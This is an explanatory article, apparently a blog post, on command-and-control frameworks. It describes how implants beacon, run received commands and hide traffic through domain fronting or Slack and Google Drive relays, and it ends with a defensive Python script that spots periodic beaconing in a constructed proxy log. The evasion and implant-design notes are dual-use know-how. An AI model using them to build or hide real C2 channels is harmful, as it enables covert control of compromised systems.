Red Teams use frameworks like Cobalt Strike or Covenant. But building your own C2 teaches you how they work (and why antivirus detects them).
Hiding in Plain Sight
Real C2s don't use raw sockets.
They hide inside legitimate-looking HTTPS traffic (for example, via domain fronting).
Or they use legitimate services such as the Google Drive or Slack APIs to relay commands, making them impossible to block without blocking Google or Slack itself.
1. The Agent (Implant)
The client-side code (the malware) must be persistent.
It sleeps for 5 minutes, wakes up, sends a "heartbeat" (a GET request) to the server, executes any command it receives, and sleeps again.
This regular cadence is why finding "beacons" in network logs is a key job for Blue Teams.
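The sleep-wake-heartbeat loop described above leaves a periodic footprint in proxy logs, and that is what a Blue Team hunts for. The following is an added defender-side example, not code from the original page or from any C2 framework: it builds a small constructed proxy log (one host checking in roughly every 300 seconds, one host browsing irregularly), groups requests by (source, destination host), and flags pairs whose inter-request intervals are nearly constant. The log format, the hostnames under .invalid and the thresholds are assumptions chosen for the example.

```python
"""Hunt for periodic "heartbeat" beaconing in proxy log lines (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

# Assumed log layout: "<ISO timestamp>Z <src ip> <method> <url> <status>"
LOG_FORMAT = "%Y-%m-%dT%H:%M:%SZ"


def _make_sample_log():
    """Constructed sample data: one beaconing host and one human browser."""
    base = datetime(2024, 5, 1, 9, 0, 0)
    lines = []
    # Beacon: check-in every 300 s with a few seconds of jitter (constructed)
    jitter = [0, 2, -1, 3, 0, 1, -2, 2, 0, 1]
    for i, j in enumerate(jitter):
        t = base + timedelta(seconds=300 * i + j)
        lines.append(f"{t.strftime(LOG_FORMAT)} 10.0.0.5 GET "
                     f"https://cdn.example-update.invalid/api/ping 200")
    # Human browsing: bursty, irregular gaps (constructed)
    gaps = [0, 7, 40, 3, 600, 15, 900, 5, 22, 1300]
    t = base
    for g in gaps:
        t += timedelta(seconds=g)
        lines.append(f"{t.strftime(LOG_FORMAT)} 10.0.0.7 GET "
                     f"https://news.example.invalid/page 200")
    return lines


SAMPLE_LOG = _make_sample_log()


def parse_line(line):
    """Return (timestamp, source ip, destination host) for one log line."""
    ts, src, _method, url, _status = line.split()
    host = url.split("://", 1)[1].split("/", 1)[0]
    return datetime.strptime(ts, LOG_FORMAT), src, host


def find_beacons(lines, min_requests=6, max_cv=0.1):
    """Flag (src, host) pairs whose request intervals are suspiciously regular.

    Regularity is measured as the coefficient of variation (stdev / mean) of
    the gaps between consecutive requests; a true beacon, even with modest
    jitter, has a CV near zero, while human traffic is bursty.
    """
    times = defaultdict(list)
    for line in lines:
        ts, src, host = parse_line(line)
        times[(src, host)].append(ts)

    findings = []
    for (src, host), stamps in times.items():
        if len(stamps) < min_requests:
            continue  # too few samples to call it periodic
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            findings.append({
                "src": src,
                "host": host,
                "count": len(stamps),
                "mean_interval_s": round(avg, 1),
                "cv": round(cv, 3),
            })
    return findings


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(f"beacon candidate: {hit['src']} -> {hit['host']} "
              f"every ~{hit['mean_interval_s']}s (cv={hit['cv']})")
```

The threshold `max_cv` is the knob that matters: implants that randomise their sleep ("jitter") push the CV upward, so raising it catches more beacons at the cost of flagging polling clients such as mail or update checkers, which is why a finding like this is a lead for triage rather than a verdict on its own.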